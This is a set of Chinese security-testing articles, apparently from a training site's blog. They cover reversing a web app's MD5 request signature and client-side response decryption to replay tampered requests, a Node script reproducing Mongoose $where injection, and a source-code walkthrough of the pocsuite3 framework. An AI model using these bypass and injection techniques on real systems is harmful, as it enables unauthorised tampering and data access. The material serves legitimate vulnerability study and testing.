对于常见的web或者h5的场景中,一些重要的系统都会对于参数或者敏感数据进行校验,防止被恶意篡改而利用。因此在安全测试过程中,对于一些越权、注入等测试,需要对参数值进行修改重放,那么这个过程是否能够成功第一步取决于是否可以搞定校验算法并成功绕过。因此本文主要介绍安全测试中常用的一些js逆向的技术手段。
当然对于web场景中安全测试会遇到的一些校验场景,一般包括如下两类:
1)请求参数签名验证
2)请求、响应内容加密
二、常见浏览器调试方法
js中校验算法的查找定位以及逆向分析,需要对浏览器中的部分功能模块熟练掌握,接下来对其中的面板功能、断点调试方法以及断点天机方法进行介绍。
2.1 浏览器面板功能
chrome浏览器中的面板包括元素、控制台、源代码、网络、性能、内存以及应用等多个。重点介绍常见面板功能。
元素(Elements):可以查看DOM结构、编辑CSS样式,用于测试页面布局和设计页面;
控制台(Console):执行JavaScript脚本,也可以通过Console和页面中的Javascript对象交互;
源代码(Sources):查看Web应用加载的所有文件;编辑CSS和JavaScript文件内容,包括如下:(page: 所有资源文件;filesystem: 关联本地文件;overrides:可以做文件替换,比如替换JS;代码段:可以编写脚本,影响页面,代码记录);
网络(Network):展示页面中所有的请求内容列表,能查看每项的请求头、请求行、请求体、时间线以及网络请求的瀑布图等信息;
性能(Performance):分析网页的性能表现,包括加载时间,CPU使用率、内存占用等。可以录制网页的运行过程,进行详细的性能分析;
内存(Memory):用于记录和分析页面占用内存的情况;
应用(Application):查看Web应用的数据存储情况;IndexedDB;WebSQL;本地和会话存储;Cookie;应用程序缓存图像字体和样式表等。
2.2 断点添加方式
js逆向分析中有一个非常重要的功能需要掌握,就是下断点,接下来对常用断点方式进行介绍。
1)点击关键代码进行进行断点:通过点击代码便可以下断点
2)XHR断点:执行比较靠后,距离加密函数相对较近,可以根据栈快速定位
点击+号后直接输入需要定位的接口地址即可
3)DOM事件断点:执行的比较靠前,距离加密函数比较远
在Chrome开发者工具的Elements标签页中,找到你想要设置断点的DOM元素,右键点击该元素,选择"Breakon"选项,然后根据需要选择以下三种断点之一:
Subtree Modifications:当该节点的子树发生变化时触发断点。
Attributes Modifications:当该节点的属性发生变化时触发断点。
Node Removal:当该节点被移除时触发断点
2.3 断点调试方法
通过设置断点,运行程序后就会断在设置好的断点处,这时就需要跟进代码执行,分析代码和数据的变化,梳理判断出校验的算法和逻辑,好进行利用。
图中红框依次功能如下:
跳过子函数(次态函数)执行(只在主函数内一步一步执行,不进入子函数内部)
进入子函数(次态函数)执行(在主函数内部一步一步执行,如果遇到子函数,会跳转到子函数内部一步一步执行)
跳出当前函数,回到调用位置
单步执行,会进入到函数内部 更加的细致
屏蔽断点
三、js逆向分析实战
了解了一些基础的调试操作内容,接下来针对js的逆向分析进行实操,本次主要以请求参数的签名验证和响应内容的加密两方面进行分析和绕过实战,这也是平时安全测试过程中最常见的两种场景。
3.1 请求参数签名验证实战
通过抓包可以看到该请求体中存在sign参数,值为一段数字字母
修改page内容,重新进行提交请求,返回错误,那么这时候想要测试注入等手法都是无法成功的,因为当重放是sign值是未变的,所以后端验证也是不通过的。接下来首先就需要找出sign的算法逻辑,尝试绕过后才可以进行测试。
3.1.1 算法分析
通过数据包分析判断为sign参数为参数校验,因此在调试解密直接搜索关键词sign=,成功在代码中查询到,
可以看到sign=Xt(a)这个方法,在此处点击下断点
通过断点可以看到Xt()方法中传入了n,n为一系列用户端数据和key值生成,
继续进入下一个函数调用,可以看到为Vt(),并传入了上边的t作为参数
查看Vt()方法实际名称为Et
进入Et函数,发现分别执行Rt->At->Tt三个方法,将最终执行完的结果返回。
三个方法具体内容也是在一起,依次进行执行,执行完Rt进入At执行
可以看到At中又包括Lt->Nt->Dt三个函数
依次进行下一个函数进行执行
进入Lt函数执行,可以发现大量循环操作等执行,如果没有太多意义可以跳出当前函数,进行下一个函数的执行
通用的执行方法进行Nt和Dt两个函数的执行和分析
当At函数执行完,可以看到返回了一串值
再进入Tt中执行
可以看出其实是一个字符串的对比操作
继续执行完Et后可以看出返回了遗传字符,应该就是我们的sign的值
继续跟进,可以看到对于这段值有做了一次大写的操作
完成后进行了返回
那这个时候也就分析完成了,我们可以确认Xt函数将入参执行完成后就会返回为sign用来做校验
在控制台获取传入的n值,并打印Xt(n)方法,额可以看到成功打印出我们需要的sign值
3.1.2 算法逆向绕过实战
通过上述的分析,可以看出该程序中的sign的获取是通过Xt()函数传入n值进行生成的,n为一个固定格式的用户的参数,那么便可以通过修改n的值生成sign来绕过校验了,接下来我们通过三种方法进行实操。
3.1.2.1 浏览器校验调用
抓包获取到详细数据包
修改参数重放失败
在获取到的n中将对应的参数page的值进行修改,打印Xt(n)生成一个新的sign
修改burp中的sign进行重放,成功获得数据,那么接下来便可以进行各类payload的参数测试了。
3.1.2.2 在线算法生成
通过该sign的值内容和长度可以初步判断出为md5加密所得,及Xt()方法为一个md5算法,因此利用在线md5平台,传入n的值,修改page参数重新生成大写的sign值
修改burp中的sign,成功重放
3.1.2.3 js代码补环境复用
通过算法分析可以看出主要调用Et()方法后进行一系列的函数调用,最后返回了需要的sign值,那么这时我们将该js中调用执行过的方法进行复制,在本地新建一个js,粘贴其中,最终打印Et()方法,Et中传入需要的值,也就是n,然后进行运行,如果存在报错缺少方法,缺哪个便去js中复制那个。
完成后执行该js文件,发现成功生成需要的值。
具体代码如下:
var St = 0;
function Et(s) {
return Tt(At(Rt(s)))
}
function At(s) {
return Dt(Nt(Lt(s), 8 * s.length))
}
function Tt(input) {
for (var t, e = St ? "0123456789ABCDEF" :
"0123456789abcdef", output = "", i = 0; i < input.length; i++)
t = input.charCodeAt(i),
output += e.charAt(t >>> 4 & 15) + e.charAt(15 & t);
return output
}
function Rt(input) {
for (var t, e, output = "", i = -1; ++i < input.length; )
t = input.charCodeAt(i),
e = i + 1 < input.length ? input.charCodeAt(i + 1) : 0,
55296 <= t && t <= 56319 && 56320 <= e && e <= 57343 &&
(t = 65536 + ((1023 & t) << 10) + (1023 & e),
i++),
t <= 127 ? output += String.fromCharCode(t) : t <= 2047 ?
output += String.fromCharCode(192 | t >>> 6 & 31, 128 | 63 & t) : t
<= 65535 ? output += String.fromCharCode(224 | t >>> 12 & 15, 128
| t >>> 6 & 63, 128 | 63 & t) : t <= 2097151 && (output +=
String.fromCharCode(240 | t >>> 18 & 7, 128 | t >>> 12 & 63, 128
| t >>> 6 & 63, 128 | 63 & t));
return output
}
function Lt(input) {
for (var output = Array(input.length >> 2), i = 0; i <
output.length; i++)
output[i] = 0;
for (i = 0; i < 8 * input.length; i += 8)
output[i >> 5] |= (255 & input.charCodeAt(i / 8)) <<
i % 32;
return output
}
function Dt(input) {
for (var output = "", i = 0; i < 32 * input.length; i += 8)
output += String.fromCharCode(input[i >> 5] >>> i %
32 & 255);
return output
}
function Nt(t, e) {
t[e >> 5] |= 128 << e % 32,
t[14 + (e + 64 >>> 9 << 4)] = e;
for (var a = 1732584193, b = -271733879, n = -1732584194, r =
271733878, i = 0; i < t.length; i += 16) {
var o = a
, c = b
, l = n
, f = r;
a = qt(a, b, n, r, t[i + 0], 7, -680876936),
r = qt(r, a, b, n, t[i + 1], 12, -389564586),
n = qt(n, r, a, b, t[i + 2], 17, 606105819),
b = qt(b, n, r, a, t[i + 3], 22, -1044525330),
a = qt(a, b, n, r, t[i + 4], 7, -176418897),
r = qt(r, a, b, n, t[i + 5], 12, 1200080426),
n = qt(n, r, a, b, t[i + 6], 17, -1473231341),
b = qt(b, n, r, a, t[i + 7], 22, -45705983),
a = qt(a, b, n, r, t[i + 8], 7, 1770035416),
r = qt(r, a, b, n, t[i + 9], 12, -1958414417),
n = qt(n, r, a, b, t[i + 10], 17, -42063),
b = qt(b, n, r, a, t[i + 11], 22, -1990404162),
a = qt(a, b, n, r, t[i + 12], 7, 1804603682),
r = qt(r, a, b, n, t[i + 13], 12, -40341101),
n = qt(n, r, a, b, t[i + 14], 17, -1502002290),
a = Ft(a, b = qt(b, n, r, a, t[i + 15], 22, 1236535329),
n, r, t[i + 1], 5, -165796510),
r = Ft(r, a, b, n, t[i + 6], 9, -1069501632),
n = Ft(n, r, a, b, t[i + 11], 14, 643717713),
b = Ft(b, n, r, a, t[i + 0], 20, -373897302),
a = Ft(a, b, n, r, t[i + 5], 5, -701558691),
r = Ft(r, a, b, n, t[i + 10], 9, 38016083),
n = Ft(n, r, a, b, t[i + 15], 14, -660478335),
b = Ft(b, n, r, a, t[i + 4], 20, -405537848),
a = Ft(a, b, n, r, t[i + 9], 5, 568446438),
r = Ft(r, a, b, n, t[i + 14], 9, -1019803690),
n = Ft(n, r, a, b, t[i + 3], 14, -187363961),
b = Ft(b, n, r, a, t[i + 8], 20, 1163531501),
a = Ft(a, b, n, r, t[i + 13], 5, -1444681467),
r = Ft(r, a, b, n, t[i + 2], 9, -51403784),
n = Ft(n, r, a, b, t[i + 7], 14, 1735328473),
a = Ut(a, b = Ft(b, n, r, a, t[i + 12], 20, -1926607734),
n, r, t[i + 5], 4, -378558),
r = Ut(r, a, b, n, t[i + 8], 11, -2022574463),
n = Ut(n, r, a, b, t[i + 11], 16, 1839030562),
b = Ut(b, n, r, a, t[i + 14], 23, -35309556),
a = Ut(a, b, n, r, t[i + 1], 4, -1530992060),
r = Ut(r, a, b, n, t[i + 4], 11, 1272893353),
n = Ut(n, r, a, b, t[i + 7], 16, -155497632),
b = Ut(b, n, r, a, t[i + 10], 23, -1094730640),
a = Ut(a, b, n, r, t[i + 13], 4, 681279174),
r = Ut(r, a, b, n, t[i + 0], 11, -358537222),
n = Ut(n, r, a, b, t[i + 3], 16, -722521979),
b = Ut(b, n, r, a, t[i + 6], 23, 76029189),
a = Ut(a, b, n, r, t[i + 9], 4, -640364487),
r = Ut(r, a, b, n, t[i + 12], 11, -421815835),
n = Ut(n, r, a, b, t[i + 15], 16, 530742520),
a = Bt(a, b = Ut(b, n, r, a, t[i + 2], 23, -995338651), n,
r, t[i + 0], 6, -198630844),
r = Bt(r, a, b, n, t[i + 7], 10, 1126891415),
n = Bt(n, r, a, b, t[i + 14], 15, -1416354905),
b = Bt(b, n, r, a, t[i + 5], 21, -57434055),
a = Bt(a, b, n, r, t[i + 12], 6, 1700485571),
r = Bt(r, a, b, n, t[i + 3], 10, -1894986606),
n = Bt(n, r, a, b, t[i + 10], 15, -1051523),
b = Bt(b, n, r, a, t[i + 1], 21, -2054922799),
a = Bt(a, b, n, r, t[i + 8], 6, 1873313359),
r = Bt(r, a, b, n, t[i + 15], 10, -30611744),
n = Bt(n, r, a, b, t[i + 6], 15, -1560198380),
b = Bt(b, n, r, a, t[i + 13], 21, 1309151649),
a = Bt(a, b, n, r, t[i + 4], 6, -145523070),
r = Bt(r, a, b, n, t[i + 11], 10, -1120210379),
n = Bt(n, r, a, b, t[i + 2], 15, 718787259),
b = Bt(b, n, r, a, t[i + 9], 21, -343485551),
a = zt(a, o),
b = zt(b, c),
n = zt(n, l),
r = zt(r, f)
}
return Array(a, b, n, r)
}
function Mt(q, a, b, t, s, e) {
return zt((n = zt(zt(a, q), zt(t, e))) << (r = s) | n >>>
32 - r, b);
var n, r
}
function qt(a, b, t, e, n, s, r) {
return Mt(b & t | ~b & e, a, b, n, s, r)
}
function Ft(a, b, t, e, n, s, r) {
return Mt(b & e | t & ~e, a, b, n, s, r)
}
function Ut(a, b, t, e, n, s, r) {
return Mt(b ^ t ^ e, a, b, n, s, r)
}
function Bt(a, b, t, e, n, s, r) {
return Mt(t ^ (b | ~e), a, b, n, s, r)
}
function zt(t, e) {
var n = (65535 & t) + (65535 & e);
return (t >> 16) + (e >> 16) + (n >> 16) << 16 | 65535
& n
}
console.log(Et("test"));
那么这个时候再传入n,及前面获取到的实际字段,并修改page的值重新生成
burp中替换sign重放,成功获取到数据
3.2 请求、响应内容加密
安全测试中,除了参数的校验之外,还有一类就是请求或者响应内容的加密,那么需要测试就必须先解密,看到原始内容才可以进行,本次以响应内容加密作为案例进行分析实操。
3.2.1 算法分析
通过截图可以看到,利用系统可以做翻译,
但是实际接口返回值是加密的,因此需要通过抓包接口测试,必须找到解密算法,获取响应内容
在源代码中进行XHR断点设置,添加uri为断点
输入数据,成功断下,可以看到断到了send函数,这个其实是向服务器发包的一个方法
跳过到下一个函数进行执行
可以看到data为key值等
继续跳过执行,可以看到成功获取到返回的加密值
再跳过执行可以看到执行该函数da.A.decodeData(),从名称也可以看出为一个解码的函数,分别传入了o和key以及iv,那么o为加密的值,key和iv分别为前面获取到的内容,执行完成后成功返回了解密后的明文数据
那么通过控制台面板,出入o为加密值,复制da.A.decodeData()进行执行,成功获得解密的数据。
3.2.2 算法逆向绕过
通过上述算法成功获取到具体的解密函数,这时利用burp抓包,修改参数为各类payload,进行重放
将获取到的加密数据,通过控制台面板传入o,并调用da.A.decodeData()成功获取原始数据,达到测试的效果。
当然,通过该解密方法的传值和分析,其实也可以看出是什么加密算法,也可以直接通过编写本地算法代码进行解密,具体不再详细赘述。
四、总结
对于安全测试或者漏洞挖掘中,这类js的加密校验也是越来越多,目的也是为了达到测试攻击等行为的成本,要想完成测试首先需要分析或者绕过校验参数,对于测试或者漏洞挖掘来说,怎么速度更快更能高效的达到算法的绕过其实目的就达到了。根据上述列出的两类场景和分析实战方法,便可以满足大部分的js逆向场景。
Mongoose 搜索注入漏洞分析
漏洞简介
CVE-2024-53900 Mongoose 8.8.3、7.8.3 和 6.13.5 之前的版本容易受到 $where 运算符不当使用的影响。此漏洞源于 $where 子句能够在 MongoDB 查询中执行任意 JavaScript 代码,这可能导致代码注入攻击以及未经授权的数据库数据访问或操纵。
CVE-2025-23061 Mongoose 8.9.5、7.8.4 和 6.13.6 之前的版本容易受到 $where 运算符不当使用的影响。此漏洞源于 $where 子句能够在 MongoDB 查询中执行任意 JavaScript 代码,可能导致代码注入攻击以及未经授权的数据库数据访问或操纵。该问题的存在是因为CVE-2024-53900的修复不完整。
Mongoose 是一个用于 Node.js 的 MongoDB 对象建模工具,它使得与 MongoDB 数据库交互变得更加简单和高效。我们可以看到这两个漏洞描述大体相同,都是因为在使用 $where 运算符时出现了问题。
环境搭建
安装 MongoDB 不知道是不是本地环境的问题,错误百出,于是还是采用 docker 来安装 docker pull mongo docker run --name mongodb -d -p 27017:27017 mongo
快速创建一个项目并指定 mongoose 版本
npm init -y
npm install mongoose@6.13.4 --save
node test.js
漏洞复现
根据漏洞特点我编写了一个 js 脚本,在不同版本下执行,比较不同情况对应的结果
const mongoose = require("mongoose");
// 连接 MongoDB
const MONGO_URI = "mongodb://localhost:27017/testdb";
async function testWhereInjection() {
await mongoose.connect(MONGO_URI, { useNewUrlParser: true, useUnifiedTopology: true });
// 定义 User 模型和 Post 模型
const UserSchema = new mongoose.Schema({
username: String,
isAdmin: Boolean,
password: String
});
const PostSchema = new mongoose.Schema({
title: String,
content: String,
author: { type: mongoose.Schema.Types.ObjectId, ref: 'User' }
});
const User = mongoose.model("User", UserSchema);
const Post = mongoose.model("Post", PostSchema);
// 插入测试数据
await User.deleteMany({});
await Post.deleteMany({});
const users = await User.insertMany([
{ username: "admin", isAdmin: true, password: "admin123" },
{ username: "user1", isAdmin: false, password: "user123" },
{ username: "user2", isAdmin: false, password: "user456" }
]);
await Post.insertMany([
{ title: "Post 1", content: "Content 1", author: users[0]._id },
{ title: "Post 2", content: "Content 2", author: users[1]._id }
]);
console.log("√ 已插入测试数据");
// 1. 正常的 populate 查询
try {
const result = await Post.findOne().populate({
path: 'author',
match: { username: "admin" }
});
console.log("√ 正常 populate 查询结果:", result);
} catch (err) {
console.error("× 正常 populate 查询失败:", err.message);
}
// 2. 测试 populate match 中的 $where 注入
try {
const result = await Post.findOne().populate({
path: 'author',
match: { $where: "this.isAdmin" } // 修改这里,去掉 return
});
console.log("√ `$where` populate 查询成功,说明可能存在漏洞:", result);
} catch (err) {
console.error("× `$where` populate 查询被拦截:", err.message);
}
// 3. 测试深层嵌套的 $where 注入
try {
const result = await Post.findOne().populate({
path: 'author',
match: {
$and: [
{ nested: { $where: "this.isAdmin" } } // 修改这里,去掉 return
]
}
});
console.log("√ 嵌套 `$where` populate 查询成功,说明可能存在漏洞:", result);
} catch (err) {
console.error("× 嵌套 `$where` populate 查询被拦截:", err.message);
}
// 4. 测试数组中的 $where 注入
try {
const result = await Post.findOne().populate({
path: 'author',
match: [{ $where: "this.isAdmin" }] // 修改这里,去掉 return
});
console.log("√ 数组中的 `$where` populate 查询成功,说明可能存在漏洞:", result);
} catch (err) {
console.error("× 数组中的 `$where` populate 查询被拦截:", err.message);
}
await mongoose.disconnect();
}
testWhereInjection().catch(console.error);
mongoose@6.13.4
mongoose@6.13.5
mongoose@6.13.6
通过执行结果我们发现,在 mongoose@6.13.4 中,$where 语句可以任意执行语句,经过修复后的 mongoose@6.13.5 中,只能通过嵌套来执行插入的语句,mongoose@6.13.6 已经修复了通过嵌套执行插入语句的问题。
漏洞分析
https://github.com/Automattic/mongoose/compare/6.13.4...6.13.5?diff=split&w=& 第一次进行修复
1. 首先判断 match 是否为一个数组,使用 Array.isArray(match) 进行检查。
2. 如果 match 是一个数组,则使用 for...of 循环遍历数组中的每个元素 item。
3. 对于每个 item,进行以下检查:
如果 item 不为 null (item !\= null),并且 item 对象中存在 $where 属性 (item.$where),则抛出一个 MongooseError 异常,错误信息为 "Cannot use $where filter with populate() match"。这是因为在 populate() 查询中不允许使用 $where 操作符。
4. 如果 match 不是一个数组,则进行另一个判断:
如果 match 不为 null (match !\= null),并且 match 对象中存在 $where 属性 (match.$where !\= null),同样抛出一个 MongooseError 异常,错误信息为 "Cannot use $where filter with populate() match"。
进行 populate() 查询时,防止使用 $where 操作符,检查传入的 match 参数是否包含 $where 属性,无论 match 是一个数组还是一个对象。如果发现 match 中存在 $where 属性,就会抛出一个 MongooseError 异常,提示不能在 populate() 查询中使用 $where 过滤器
https://github.com/Automattic/mongoose/compare/6.13.5...6.13.6?diff=split&w=& 第二次修复
1. 函数接受一个参数 match,表示要检查的对象。
2. 首先进行两个条件判断:
如果 match 为 null 或 undefined,直接返回,不进行后续检查。
如果 match 的类型不是对象,也直接返回,不进行后续检查。 这两个判断是为了避免对非对象类型进行遍历和递归。
3. 使用 Object.keys(match) 获取 match 对象的所有属性键,并使用 for...of 循环遍历每个属性键 key。
4. 对于每个属性键 key,进行以下检查:
如果 key 等于 '$where',表示在 match 对象中发现了 $where 操作符,抛出一个 MongooseError 异常,错误信息为 "Cannot use $where filter with populate() match"。
5. 如果当前属性的值 match[key] 不为 null 或 undefined,并且其类型为对象,则递归调用 throwOn$where 函数,将 match[key] 作为参数传入,对嵌套的对象进行相同的检查。
通过递归调用 throwOn$where 函数,可以对 match 对象进行深度遍历,检查其中是否包含 $where 操作符,无论 $where 操作符位于对象的哪个层级。
pocsuite3安全工具源码分析
pocsuite3 是由 知道创宇 404实验室 开发维护的开源远程漏洞测试和概念验证开发框架。为了更好理解其运行逻辑,本文将从源码角度分析该项目的初始化,多线程函数,poc模板等等源码。
项目结构
api:对要导入的包重命名,方便后续导入调用data:存储用户需要使用的文档数据lib:项目核心代码modules:存储用户自定义的模块plugins:存储用户自定义的插件pocs:存储poc文件shellcodes:存储生成php,java,python等脚本语言的利用代码,以及反弹shell的利用代码cli.py:项目的入口console.py:命令行界面
进入项目入口:/pocsuite3/cli.py
check_environment() #检查当前工作目录是否符合当前系统set_paths(). #设置后续需要用到的数据,目录信息banner() #打印命令行页面的横幅
init_options(cmd_line_parser().dict) # 命令行参数处理跟进cmd_line_parser()查看:
此处注意一个参数-c
target.add_argument("-c", dest="configFile", help="Load options
from a configuration INI file")
可以先在pocsuite.ini配置好参数,通过pocsuite -c pocsuite.ini 运行
双重跟进init_options(),找到命令行存储参数:
可见采用了类似字典的形式存储,避免了重复数据且还有其它四个参数也采用了该形式存储,五个参数贯穿整个项目
conf:存储基本配置信息kb:存储了目标地址、加载的PoC、运行模式、输出结果、加载的PoC文件地址、多线程信息等cmd_line_options:是存储命令行输入的参数值merged_options:存储输入值与默认值合并后的结果paths:存储数据、插件、poc等目录地址
参数获取处理完后,进入项目初始化,init()函数,一下对部分函数进行注解分析:
def init():
"""
Set attributes into both configuration and knowledge base singletons
based upon command line and configuration file options.
"""
set_verbosity() #日志输出级别设置
_adjust_logging_formatter() #调整日志格式器
_cleanup_options() #将各个配置项格式化,并校验合法性
_basic_option_validation() #校验seebug,zoomeye等api,token的合法性
_create_directory() #检测文件路径是否存在,不存在则创建
_init_kb_comparison()
update()
_set_multiple_targets() #读取目标
_set_user_pocs_path()
_set_pocs_modules() #动态加载poc
_set_plugins() #动态加载插件
_init_targets_plugins()
_init_pocs_plugins()
_set_task_queue() #初始化多线程设置
_init_results_plugins() #初始化输出插件
AttribDict类解析
前文也提到过以下五个全局变量,它们均通过创建AttribDict类的实例进行使用,现在我们跟进类详细分析:
AttribDict()类:
自定义类,继承自python内建的OrderedDict类,扩展访问方式,简化了对字典键的访问。主要存在三个方法:getattr(),setattr(),delattr()这三个方法在if判断逻辑均相同:1:以双下划线 __ 开头(例如,Python 的内置属性,如 dict)。2:以 _OrderedDict__ 开头(因为 OrderedDict在内部实现中使用的名称)。3:名字存在于 exclude_keys 集合中(排除的键)。如果任一条件成立,说明这个属性不应该通过 obj.attr访问,所以跳过使用自定义的 getattr处理,直接调用父类对应的方法访问。例:getattr()就调
如果属性名不满足,则通过字典的方式,添加或者删除AttribDict中
地址处理代码分析
先查看存储初始数据,存在则进行下一步。通过set()创建集合方便去重,再遍历conf.url数据,通过parde_target()进行对url进行分析处理,并且在不为空的情况下调用集合的add()方法添加,完成后再将,用于临时存储的target集合里面的数据,放到kb这种全局变量内。parde_target()函数
接受参数后先if判断,如果是域名,url,ip:端口形式则直接赋值给target跟进其中一个判断函数:
跟进:
可见是通过正则进行判断。接着再判断如果为http://ipv6形式,则启动ipv6配置,并进行赋值target,依旧是正则判断。
再判断如果为ipv4则调用python内置ip_address解析赋值,该方法自动区分ipv4或者ipv6并最后返回对应的对象。再通过else判断,对纯ipv6地址,或者ipv6网络进行解析赋值。
动态poc加载
Step1:从pocs目录加载先通过os.listdir读取对应目录,返回一个含有poc的py文件的列表。再通过filter()函数过滤init.之类文件,不过此时filter()函数返回的是一个迭代器,所以又通过list()函数将数据处理成列表再赋值。(lambda x: x not in ['init.py','init.pyc']:这个匿名函数会检查每个文件名 x 是否不等于'init.py' 或 'init.pyc'。)
再从含有类似thinkphp_poc.py的文件名中,通过x变量循环读取,并通过splitex()函数将其分为"thinkphp_poc",".py"格式的键值队元组。再次通过dict()字典函数,将x元组的第一个元素作为字典的键,第二个元素作为字典的值。
如果poc是目录,则使用 os.walk() 递归遍历该目录下的所有文件,过滤出 .py或 .yaml 文件,并将其完整路径添加到 _pocs 列表中。
Step2:遍历加载 PoC 文件内容并检查,并对加载失败的poc进行日志记录。
Step3:最后从 Seebug 网站加载 PoC。
poc模版跟据目录找到现存poc:pocsuite3/pocs,thinkphp_rce为例
所有模版均是继承自父类POCBase,跟进:
父类在初始化时便设置了一系列可能用到的属性,例如自定义headers,目标url,端口等等。这里关注execute()函数
self.url处采用if判断:如果为http协议则采用parse_target_url()解析,else采用build_url()解析:mode值默认为verify。随后调用_execute()根据mode值执行。
shell(),attack(),_verify()均需自定义重写。回到例thinkphp_rce例子:_verify()函数如下:
调用了_check()函数进行检验:
通过request.post()发送设置好payload的请求,根据返回包关键字判断是否成功。(flag自定义)返回的结果在_verify()函数又会调用parse_output()转化为json格式输出。
动态核心load_file_to_module()继续分析_set_pocs_modules()
将读取文件切割为文件名和后缀名,根据后缀名重构路径file_pth,if判断file_path构建成功则进入红框代码处。
通过get_filename()从file_path路径提取文件名,由于wuth.ext=False,则不提取文件名后缀,提取后拼接在pocs_后并赋值给module,例如:pocs_thinkphp_rce。随后三行代码涉及到python中动态模块加载知识:
spec = importlib.util.spec_from_file_location(module_name, file_path,
loader=PocLoader(module_name, file_path))
#创建模块规格,采用自定义加载器类加载模块,loader:加载器对象,负责如何从文件加载模块
mod = importlib.util.module_from_spec(spec)#根据规格创建模块对象
spec.loader.exec_module(mod) #执行模块代码,确保为完整可用的模块
动态模块注解:
模块是包含 Python 代码的文件,可以通过 import语句加载并使用。通常,当你使用 import 语句导入一个模块时,Python会根据模块的名称查找相应的文件(如 .py 文件),并将其加载到内存中。
然而,在一些特殊的情况下,比如动态加载模块或运行时创建模块,我们需要用到importlib 模块。importlib提供了一些工具,可以帮助我们在运行时加载模块,而不是在编写代码时静态地导入。
例如:importlib.util.spec_from_file_location
spec(模块加载规格)描述了如何加载一个模块。它定义了如何找到模块代码,如何加载它,以及加载时需要的一些元数据。类似于说明书,它告诉Python 模块在哪里、叫什么名字、以及如何加载它。
接着看看是如何调用loader加载器的exec_module()函数进行加载的:
filename接受poc绝对路径,poc_code接受poc文件内容。随后调用check_requires()检查代码运行中需要的包,通过import函数导入。compile()为python内置函数,将源代码字符串poc_code编译为字节码,'exec'这是一个编译模式,表示代码将作为一段可执行的代码被执行。常见的编译模式有'eval'(用于单个表达式)和 'exec'(用于整个代码块)之后再调用exec()函数执行字节码对象obj当中的代码,并绑定到module.dict上,这样就可以通过module.函数()直接调用poc_code当中的函数。
多线程与输出加载
跟进:_set_task_queue()
if判断,poc模版与目标ip均不为空情况下,遍历出poc_module与target。并将它们组成元组,加入kb.task_queue中,确保数据在线程安全传输。
start()函数
调用runtime_check()检查poc是否加载成功:
再调用python标准库中的queue.Queue类的qsize()方法,获取先前kb.task_queue队列的任务数量。run_threads()函数随后进入start()函数核心:run_threads(conf.threads, task_run):该函数传入线程数conf.threads(),与多线程执行函数task_run()。
这个函数的目的是启动多个线程并执行给定的函数thread_function。num_threads: 需要启动的线程数量。thread_function: 要在线程中运行的目标函数。args: 传递给 thread_function 的参数,默认为空元组。forward_exception: 控制是否在捕获异常后继续传播异常,默认值为 True。start_msg: 控制是否输出启动线程的消息,默认值为 True。
先threads = []创建空列表,用来存储后续的线程实例
随后进行线程数检查,如果大于1,则是多线程,并在线程数超过max时发出告警提示,线程不大于1,则直接执行函数
检查完为多线程则进行下一步:循环创建线程,并启动
根据num_threads数量循环创建,并调用setDaemon(TRUE)将所有线程设置为守护线程。(守护线程:后台运行,随主线程终止而终止)
随后再调用python标准库函数isAlive()进行循环检查,直到所有线程完成才跳出循环。(python3建议使用is_Alive()函数)。
执行完run_threads()函数后,finally代码再执行task_done(),跟进该函数,内部存在三个函数:
show_task_result():会取出poc执行结果,然后格式化输出
result_plugins_start():该函数负责调用file_record.py中的start()函数
result_compare_handle():显示来自各个搜索引擎的对比数据
先前已经分析了start(0函数核心在于run_threads(conf.threads,task_run),我们接着跟进分析多线程执行函数:task_run()
多线程执行函数:
task_run():
先确认task_queue不为空,并且thread_continue为真,随后从task_queue获取目标ip与poc模版
(之前通过task_queue.put((target,poc_module))存储进去的)
随后调用python标准库copy模块中的deepcpy,进行深拷贝操作,复制poc模版,防止原始poc模块被修改。
poc_name获取poc模块名称方便日志打印。
随后处理用户自定义参数,检查是否尝试修改白名单内容,并校验是否存在必选参数未设置。
随后进入核心代码块,根据传参调用excute()函数:
后续则是根据测试成功或者失败,对结果进行处理输出
综合文章分析,pocsuite3项目被我分成如下执行流程:
在clip.py中调用main()函数,整个项目则开始执行,进行环境检查,参数获取后,则进入核心代码:在main()函数中调用init()与start()函数,最后则是我上文刚分析过的数据处理与输出格式化。
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

